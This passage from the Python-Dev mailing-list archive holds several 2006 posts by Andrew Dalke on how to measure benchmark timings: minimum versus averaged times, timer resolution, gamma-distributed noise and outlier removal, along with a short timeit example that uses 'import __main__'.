so intuition based on that doesn't help.

> > Using the minimum looks like the way to go for calibration.
>
> Or possibly the median.

Why?  I can't think of why that's more useful than the minimum time.

Given an large number of samples the difference between the
minimum and the median/average/whatever is mostly providing
information about the background noise, which is pretty irrelevent
to most benchmarks.

> But even better, the way to go to run comparison timings is to use a system
> with as little other stuff going on as possible.  For Windows, this means
> rebooting in safe mode, waiting until the system is quiescent, and then run
> the timing test with *nothing* else active that can be avoided.

A reason I program in Python is because I want to get work done and not
deal with stoic purity.  I'm not going to waste all that time (or money to buy
a new machine) just to run a benchmark.

Just how much more accurate would that be over the numbers we get
now.  Have you tried it?  What additional sensitivity did you get and was
the extra effort worthwhile?

> Even then, I would look at the distribution of times for a given test to
> check for anomalously high values that should be tossed.  (This can be
> automated somewhat.)

I say it can be automated completely.  Toss all but the lowest.
It's the one with the least noise overhead.

I think fitting the smaller data points to a gamma distribution might
yield better (more reproducible and useful) numbers but I know my
stats ability is woefully decayed so I'm not going to try.  My observation
is that the shape factor is usually small so in a few dozen to a hundred
samples there's a decent chance of getting a time with minimal noise
overhead.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke
On 6/2/06, M.-A. Lemburg <[EMAIL PROTECTED]> wrote:
> It's interesting that even pressing a key on your keyboard
> will cause forced context switches.

When niceness was first added to multiprocessing OSes people found their
CPU intensive jobs would go faster by pressing enter a lot.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Benchmarks

2006-06-03 Thread Andrew Dalke
Tim:
> A lot of things get mixed up here ;-)  The _mean_ is actually useful
> if you're using a poor-resolution timer with a fast test.

In which case discrete probability distributions are better than my assumption
of a continuous distribution.

I looked at the distribution of times for 1,000 repeats of
   t1 = time.time()
   t2 = time.time()
   times.append(t2-t1)

The times and counts I found were

9.53674316406e-07 388
1.19209289551e-06 95
1.90734863281e-06 312
2.14576721191e-06 201
2.86102294922e-06 2
1.90734863281e-05 1
3.00407409668e-05 1

This implies my Mac's time.time() has a resolution of 2.384185791015e-07 s
(0.2µs or about 4.2MHz.)  Or possibily a small integer fraction thereof.  The
timer overhead takes between 4 and 9 ticks.  Ignoring the outliers, assuming I
have the CPU all to my benchmark for the timeslice then I expect about +/- 3
ticks of noise per test.

To measure 1% speedup reliably I'll need to run, what, 300-600 ticks?  That's
a millisecond, and with a time quantum of 10 ms there's a 1 in 10 chance that
I'll incur that overhead.

In other words, I don't think my high-resolution timer is high enough.  Got
a spare Cray I can use, and will you pay for the power bill?

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Benchmarks

2006-06-03 Thread Andrew Dalke
On 6/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> - I would average the timings of runs instead of taking the minimum value as
> sometimes bench marks could be running code that is not deterministic in its
> calculations (could be using random numbers that effect convergence).

I would rewrite those to be deterministic.  Any benchmarks of mine which
use random numbers initializes the generator with a fixed seed and does
it in such a way that the order or choice of subbenchmarks does not affect
the individual results.  Any other way is madness.

> - Before calculating the average number I would throw out samples
> outside 3 sigmas (the outliers).

As I've insisted, talking about sigmas assumes a Gaussian distribution.
It's more likely that the timing variations (at least in stringbench) are
closer to a gamma distribution.

> Here is a passage I found ...
 ...
>   Unfortunately, defining an outlier is subjective (as it should be), and the
>   decisions concerning how to identify them must be made on an individual
>   basis (taking into account specific experimental paradigms

The experimental paradigm I've been using is:
  - precise and accurate clock on timescales much smaller than the
   benchmark (hence continuous distributions)
  - rare, random, short and uncorrelated interruptions

This leads to a gamma distribution (plus constant offset for minimum
compute time)

Gamma distributions have longer tails than Gaussians and hence
more "outliers".  If you think that averaging is useful then throwing
those outliers away will artificially lower the average value.

To me, using the minimum time, given the paradigm, makes sense.
How fast is the fastest runner in the world?  Do you have him run
a dozen times and get the average, or use the shortest time?

> I usually use this approach while reviewing data obtained by fairly
> accurate sensors so being being conservative using 3 sigmas works
> well for these cases.

That uses a different underlying physical process which is better
modeled by Gaussians.

Consider this.  For a given benchmark there is an absolute minimum time
for it to run on a given machine.  Suppose this is 10 seconds and the
benchmark timing comes out 10.2 seconds.  The +0.2 comes from
background overhead, though you don't know exactly what's due to overhead
and what's real.

If the times were Gaussian then there's as much chance of getting
benchmark times of 10.5 seconds as of 9.9 seconds.  But repeat the
benchmark as many times as you want and you'll never see 9.9 seconds,
though you will see 10.5.

> - Another improvement to bench marks can be obtained when both
> the old and new code is available to be benched mark together.

That's what stringbench does, comparing unicode and 8-bit strings.
However, how do you benchmark changes which are more complicated
than that?  For example, benchmark changes to the exception
mechanism, or builds under gcc 3.x and 4.x.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 328 and PEP 338, redux

2006-07-01 Thread Andrew Dalke
Giovanni Bajo <[EMAIL PROTECTED]> wrote:
> Real-world usage case for import __main__? Otherwise, I say screw it :)

I have used it as a workaround for timeit.py's requirement that I pass
it strings instead of functions.

>>> def compute():
... 1+1
...
>>> import timeit
>>> t = timeit.Timer("__main__.compute()", "import __main__")
>>> t.timeit()
1.9755008220672607
>>>

You can argue (as many have) that timeit.py needs a better API for
this.  That's a different world than the existing real one.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com